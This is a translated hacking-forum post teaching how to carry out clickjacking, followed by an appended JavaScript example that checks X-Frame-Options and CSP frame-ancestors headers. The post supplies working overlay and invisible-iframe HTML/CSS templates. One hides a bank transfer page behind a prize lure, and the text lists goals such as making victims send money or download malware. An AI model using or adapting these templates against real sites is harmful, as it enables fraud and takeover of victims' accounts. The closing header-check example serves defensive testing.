What is Clickjacking Attack, How To Do It?

Vilge234

New member
1 Oct 2020
❧What Is Clickjacking, How To Do It? Slyfer❧


Hello, I want to show you what a ''Clickjacking Attack'' is and how to do it. First of all, what is ''Clickjacking''? A clickjacking attack is the process of feeding back screen codes to the victim after they click on a specially placed code set (for example: free download, crack download sites, etc.) while the victim is browsing a malicious web page.

For a very simple example, a clickjacking attack on Facebook is done as follows:

A visitor is drawn into a malicious page. It doesn't matter how.
There is a link on the site that seems harmless (like "get rich now", "click here", "download free", etc.).
The malicious page positions an <iFrame> with src from facebook.com on this link. In fact, the ''Like'' button is just above that link. This is usually done with z-index. The visitor actually clicks the button while trying to click the link and, abracadabra, the victim swallows the bait and does what we wanted on Facebook :)


The attacker creates an invisible iFrame on the page and loads his tool page into it. The malicious page contains a visual element to convince the user to click. For example, it may have a visual element similar to a video player with a play button in the center. The user clicks on the play button but, due to the texture, clicks on a URL element on the tool page.

The attacker creates a 1 x 1 iFrame that moves with the mouse cursor. Due to its size and ********, this frame is completely invisible (the cursor symbol is hidden below its edge). If the user clicks anywhere, he clicks on whatever is loaded and positioned in this 1 x 1 frame.



The attacker uses parts of the tool page by cutting them out. For example, they create an iFrame which contains a send button from the tool page.



An attacker can abuse clickjacking vulnerabilities for various goals:

To get followers on social media, and after that probably to sell the social media account / page for corporate marketing.


To get e-mail or RSS subscribers, for the same goal as social media followers.

To act in the user's logged-in e-commerce account and purchase a product in the name of the attacker.

To make the user unknowingly transfer money to the attacker's account.

To make users download malware :)) (for example a trojan, worm, backdoor, etc.)

Generally, the uses of clickjacking are based only on attacking.




Some browsers allow web sites to drag and drop, thus making it possible to send text via clickjacking. This means clickjacking's CSRF is more effective. Therefore, it is possible to abuse spontaneous XSS vulnerabilities, or to send random content as the targeted user, for example adding a new administrative user if the victim swallows the bait.

For these reasons you have to be very cunning to do the attack. For major attacks, it isn't enough for the victim to click once; sometimes it requires several clicks or a drag and drop inside the site.





How To Do a Clickjacking Attack? Examples

Now I'll show you how to do the clickjacking attack that I prepared on a basic level. This way you'll comprehend it better. :)


Code:
<style>
  #protector {
    height: 100%;
    width: 100%;
    position: absolute;
    left: 0;
    top: 0;
    z-index: 99999999;
  }
</style>

<div id="protector">
  <a href="https://www.turkhackteam.org" target="_blank">Tıkla Kazan Dostum- Slyfer THT</a>
</div>


It's a very simple code; it immediately redirects you to the Turk Hack Team site when clicked. To change the site, it is enough to change href="https://www.turkhackteam.org".




Code:
<div style="position: absolute; left: 10px; top: 10px;">Merhaba, çok şanslısın bizden çatal bıçak takımı kazandın :) Turk Hack Team-Slyfer</div>
<div style="position: absolute; left: 200px; top: 50px;">
  <img src="https://www.linkpicture.com/q/LPic5f5a31535df0f1455795954.jpg" width="250">
</div>
<div style="position: absolute; left: 10px; top: 101px; color: red; font-weight: bold;">>> Tıkla :) <<</div>
<iframe style="opacity: 0;" height="545" width="680" scrolling="no" src="http://banka hesabı veya link örnektir/Transfer.aspx"></iframe>



Code:
<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>

<button>Click here!</button>

<div>TURK HACK TEAM</div>
THIS CODE IS QUOTED


Lastly

Clickjacking is an attack type which is completely dependent on your imagination and code knowledge. If you wish, you can do more legal things like clicking on advertisements. Or, from the victim's log records, bank account, IP address, location info and browser info, to preparing any trap that your imagination can think of. This was all I was going to tell; thanks for reading.
It is written completely for the purpose of information; there is no aim of any encouragement. I hope you enjoy the forum.


Source: https://www.turkhackteam.org/web-se...aldirisi-nedir-nasil-yapilir.html#post9184498
Translator: Vilge234
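
Every overlay in the post depends on the target page agreeing to render inside a cross-origin iframe, which the target site controls through the `X-Frame-Options` header and the CSP `frame-ancestors` directive. The following is an added example, not code from the original post: it evaluates a response's headers the way a browser does to decide whether such a frame would load. The origins `https://shop.example` and `https://lure.example` and the sample header sets are constructed, and the model is simplified to one embedding ancestor and one CSP header.

```javascript
// Added example (not from the original post): would a browser render this
// response inside an iframe on embedderOrigin? Simplified: one embedding
// ancestor, one CSP header, sources limited to 'none', 'self', * and origins.
function frameAncestors(csp) {
  for (const directive of (csp || '').split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null; // directive absent
}

function sourceAllows(source, embedderOrigin, selfOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return embedderOrigin === selfOrigin;
  if (s === '*') return true;
  if (s.includes('://*.')) { // wildcard host, e.g. https://*.partner.example
    const [scheme, host] = s.split('://*.');
    const url = new URL(embedderOrigin);
    return url.protocol === scheme + ':' && url.hostname.endsWith('.' + host);
  }
  return s === embedderOrigin.toLowerCase();
}

function canBeFramed(headers, embedderOrigin, selfOrigin) {
  const sources = frameAncestors(headers['content-security-policy']);
  if (sources !== null) {
    // frame-ancestors takes precedence over X-Frame-Options when both are set.
    return sources.some((s) => sourceAllows(s, embedderOrigin, selfOrigin));
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin === selfOrigin;
  return true; // header missing, or a value modern browsers ignore (ALLOW-FROM)
}

// Constructed sample responses for a hypothetical site https://shop.example
const SELF = 'https://shop.example';
const EVIL = 'https://lure.example';
const samples = {
  unprotected: {},
  deny: { 'x-frame-options': 'DENY' },
  sameorigin: { 'x-frame-options': 'SAMEORIGIN' },
  cspNone: { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  cspPartner: { 'content-security-policy': 'frame-ancestors https://*.partner.example' },
};
for (const [name, headers] of Object.entries(samples)) {
  console.log(name, 'framable by', EVIL, '->', canBeFramed(headers, EVIL, SELF));
}
```

Only the `unprotected` sample reports as framable by the foreign origin; a page that performs state-changing actions and shows up that way is exposed to the overlays described in the post.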